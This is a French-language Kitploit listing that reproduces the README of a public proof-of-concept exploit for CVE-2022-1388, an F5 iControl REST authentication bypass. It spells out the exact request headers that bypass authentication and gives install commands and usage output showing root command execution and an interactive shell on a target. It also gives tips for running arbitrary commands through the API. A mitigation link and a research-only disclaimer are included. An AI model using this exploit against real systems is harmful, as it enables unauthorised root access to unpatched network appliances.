Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1388-POC — Une preuve de concept améliorée pour CVE-2022-1388 avec un shell interactif | Kitploit
Outils/GitHubGitHub/psychosec2/cve-2022-1388-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubpsychosec2/cve-2022-1388-poc

CVE-2022-1388-POC

Une preuve de concept améliorée pour CVE-2022-1388 avec un shell interactif

Voir le dépôt
1441il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-1388 POC par PsychoSec

POC amélioré pour CVE-2022-1388 qui affecte plusieurs produits F5.

Ceci est une version améliorée du Proof of Concept d'Horizon3 pour CVE-2022-1388: https://github.com/horizon3ai/CVE-2022-1388

Cette version contient de multiples améliorations ainsi qu'un shell interactif pour exécuter des commandes à distance.

Analyse technique :

L'analyse technique de la cause racine de la vulnérabilité par Horizon3 est disponible sur leur blog : https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

Résumé :

Conditions nécessaires d'une requête pour exploiter cette vulnérabilité :

  1. L'en-tête Connection doit inclure X-F5-Auth-Token
  2. L'en-tête X-F5-Auth-Token doit être présent
  3. L'en-tête Host doit être localhost / 127.0.0.1 ou l'en-tête Connection doit inclure X-Forwarded-Host
  4. L'en-tête Auth doit être défini avec le nom d'utilisateur admin et n'importe quel mot de passe

Prérequis :

  • git
  • pip3
  • python3

Installation :

root@kitploit:~
git clone https://github.com/PsychoSec2/CVE-2022-1388-POC.git
cd ./CVE-2022-1388-POC
pip3 install -r requirements.txt
python3 ./CVE-2022-1388.py -h

Utilisation :

Test d'une cible :

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -t
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!

Use -s option to run an interactive shell.

Shell interactif :

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -u https://192.168.0.221 -s
Running interactive shell..

root@f5-localhost: /var/service/restjavad$ 

Ne nécessite pas l'utilisation de connexion TCP inverse ni d'écouteurs.

Options :

root@kitploit:~
root@kali:/home/dev/CVE-2022-1388-POC# python3 CVE-2022-1388.py -h
Usage: CVE-2022-1388.py [options]

Options:
  -h, --help         Show this help message.
  -u URL, --url=URL  The IP address of the target.
  -t, --test         Test target for CVE-2022-1388.
  -s, --shell        Run an interactive shell.

Important :

Veuillez noter que lors de l'exécution du shell interactif sur un système non patché, certaines commandes et syntaxes peuvent ne pas fonctionner ou donner un résultat attendu. Cela est probablement dû à l'utilisation de JSON dans les requêtes et réponses de l'API du serveur. Pour éviter tout problème, essayez de ne pas utiliser de caractères individuels qui sont courants dans la syntaxe JSON tels que les deux-points, les virgules, les accolades, les crochets, et surtout les guillemets lorsque vous utilisez le shell interactif. Toute syntaxe JSON dans une commande doit être structurée au format.

L'utilisation de toute syntaxe JSON non structurée dans une commande peut conduire à une requête API mal formée vers le serveur et pourrait vous laisser avec : aucune sortie de commande, rien n'étant exécuté, ou pourrait vous expulser entièrement du script Python. Cela rend malheureusement certaines commandes inutilisables. Pour contourner ce problème, vous pouvez plutôt écrire un script bash, le télécharger sur le serveur et l'exécuter à l'aide du shell interactif. Il n'est pas non plus possible de changer de répertoire à l'aide de la commande 'cd'.

  • Introduction à JSON : https://javaee.github.io/tutorial/jsonp001.html

Dans tous les cas, vous devriez toujours être en mesure d'obtenir une sortie de commande basique. Si vous n'obtenez aucune sortie de commande, cela ne signifie pas que la commande n'a pas été exécutée. Cependant, vous devrez le déterminer par votre propre analyse.

Mesures d'atténuation :

Mettez à jour vers la dernière version ou atténuez en suivant les instructions dans l'avis de sécurité F5

  • https://support.f5.com/csp/article/K23605346

Avertissement :

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les responsables du projet ne sont pas responsables ou redevables en cas d'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil